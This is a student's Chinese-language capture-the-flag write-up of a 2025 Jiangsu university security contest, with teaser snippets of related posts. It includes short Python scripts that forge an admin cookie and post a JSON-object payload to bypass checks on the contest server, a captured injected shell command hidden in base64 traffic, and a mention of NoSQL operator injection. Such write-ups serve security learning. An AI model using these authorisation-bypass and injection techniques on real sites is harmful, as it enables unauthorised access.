2025年江苏省第七届大学生网络安全知识技能大赛-wp

Created2025-09-22|Updated2025-09-22

|Post Views:

遗憾差一点点没进决赛，还是少个二进制啊，可惜我们学校二进制断代了┭┮﹏┭┮

比赛期间太仓促了，忘了截图，就这样纯文字吧

签到

密文：kaljviko8ohhh59;49:p
单字符的xor，写个简单脚本计算：

1 2	s = "kaljviko8ohhh59;49:p" print(''.join(chr(ord(c)^13) for c in s))

flag{dfb5beee846947}

misc1

流量包内搜索 flag 的 base64 编码的前面部分 http contains "Zmxh"

找到一段流量包，跟踪 http 流，里面有这么一段：

1	ZmxhZ3thNjVlMjdhZmMyYTdmN2UyN2ZmYjZkMjM5Mzk1ODU3Zn0iPmZsYWcudHh0O2VjaG8gY2E0OTg1ZjBmOGE5O3B3ZDtlY2hvIDJmOWUwNDJlM2Y2MQ%3D%3D

解 base64 得到 flag

flag{a65e27afc2a7f7e27ffb6d239395857f}

web1

刚开始没看到附件，傻傻的测弱口令和注入测了半天浪费了时间，实际伪造 cookie：user=admin，就可以越权

访问 flag1：

import requests

url = "http://new.mhxaskills.cn:34050/flag1"
cookies = {"user": "admin"}

r = requests.get(url, cookies=cookies)
flag1 = r.headers.get("Token")
print("flag1:", flag1)

flag2 这里访问 /getflag2 路由可以用数组绕过异常
访问 flag2：

import requests

url = "http://new.mhxaskills.cn:34050/getflag2"

payload = {"checkcode": {"length":16}}

r = requests.post(url, json=payload)
print(r.json())

拼接起来得到 flag
flag{451ea6d0-eb41-4094-dfa2-016bb104bb61}

RSA

直接用 ai 梭出脚本解出一段密文：

1	5:11:AM:6:{:0:9:5:2:4:4:5:1:5:7:8:6:1:2:3:2:1:9:1:5:8:2:AM:7:3:AM:1:3:4:0:2:2:}

把这段密文扔进随波逐流，发现是表盘 Clock Code 解码，解出 flag

flag{0jfceefbfhigbcdcbjbficahdabde0cc}

crypto

密文先解 base64 再解 hex，得到一大堆二进制数，删掉多余字符解 binary 再解 base64，最终得到 flag

flag{fc4b10b03d910b6b0c745c6f74186e59}

web2 后来没时间解了就没做，misc2 修复高宽后就不会做了，二进制我花了最多时间但是一个都做不出，我是 fw ┭┮﹏┭┮

Author: ALe

Link: https://ale1293528.github.io/2025/09/22/2025%E5%B9%B4%E6%B1%9F%E8%8B%8F%E7%9C%81%E7%AC%AC%E4%B8%83%E5%B1%8A%E5%A4%A7%E5%AD%A6%E7%94%9F%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E7%9F%A5%E8%AF%86%E6%8A%80%E8%83%BD%E5%A4%A7%E8%B5%9B-wp/

Copyright Notice: All articles on this blog are licensed under CC BY-NC-SA 4.0 unless otherwise stated.

Related Articles

依旧是单军奋战这一块，而且下午睡到 5 点多才想起来还有这么个比赛，半个小时速通两道 WEB 题这一块 WEBez_signin这题就是典型的 MongoDB NoSQL 注入，突破口在源码里 POST /search 接受 JSON 时，title/author 如果是 dict 会被原样拼进查询，没有加 $eq 且不做净化，所以可以直接塞 $ne / $regex 等操作符来“放大查询”拿到库里全部书、然后做一轮搜索搜出 flagexp： 123456789101112131415161718192021222324252627282930313233343536373839404142import requests, re, jsonbase = "http://node8.anna.nssctf.cn:27612"def dump_all(): # 取全量（有标题的都来） r = requests.post(base + "/search", hea...

比赛这两天一直在驾校练车，没时间打比赛，所以没出几道，排名也是很拉，就不放截图了 CRYPTO密码没学过，全是ai ez_math12345678910111213141516171819202122from sage.all import *from Crypto.Util.number import *flag = b'LILCTF{test_flag}'[7:-1]lambda1 = bytes_to_long(flag[:len(flag)//2])lambda2 = bytes_to_long(flag[len(flag)//2:])p = getPrime(512)def mul(vector, c): return [vector[0]*c, vector[1]*c]v1 = [getPrime(128), getPrime(128)]v2 = [getPrime(128), getPrime(128)]A = matrix(GF(p), [v1, v2])B = matrix(GF(p), [mul(v1,lambda...

比赛是之前打的，但是一直没有复盘，暑假闲来无事故决定复盘一下，也是作为复习 WEBfate12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273747576777879808182#!/usr/bin/env python3import flaskimport sqlite3import requestsimport stringimport jsonapp = flask.Flask(__name__)blacklist = string.ascii_lettersdef binary_to_string(binary_string): if len(binary_string) % 8 != 0: raise ValueError("Binary string length must be a multiple of 8"...

校赛题目推断

之前因为期末的原因没有去打，现在闲下来了突然想起来，但是现在已经不开放了，所以就进行一个通过题目名称猜测题目内容的活动，也是水一篇blog，顺便鉴定一下学长的成分（下面是题目列表 1234567891011121314151617181920212223MiscHTTPS怎么也不安全张静媛学姐的秘密文件段涵涵学姐最爱的音乐流量分析-1 流量分析-2 流量分析-3 流量分析-4 流量分析-5 流量分析-6 流量分析-7 流量分析-8CryptoBase141 RSA你太baby了愤怒的笑笑Webbusy_search can_u_escape ez?upload2 ez_upload give!me!money! lottery签到重生版 pop之我又双叒叕重生了 u_know? 函数重生版小猿口算签到重生版Reversemaze IDA Xor rere sw1f7's TEA sw1f7's XXTEAMobilease_androidOSINT杜浩学姐の朋友圈杜浩学姐の旅行 MISC总体还是比较难猜，直接放弃 WEB还是这个稍稍好猜一点点，...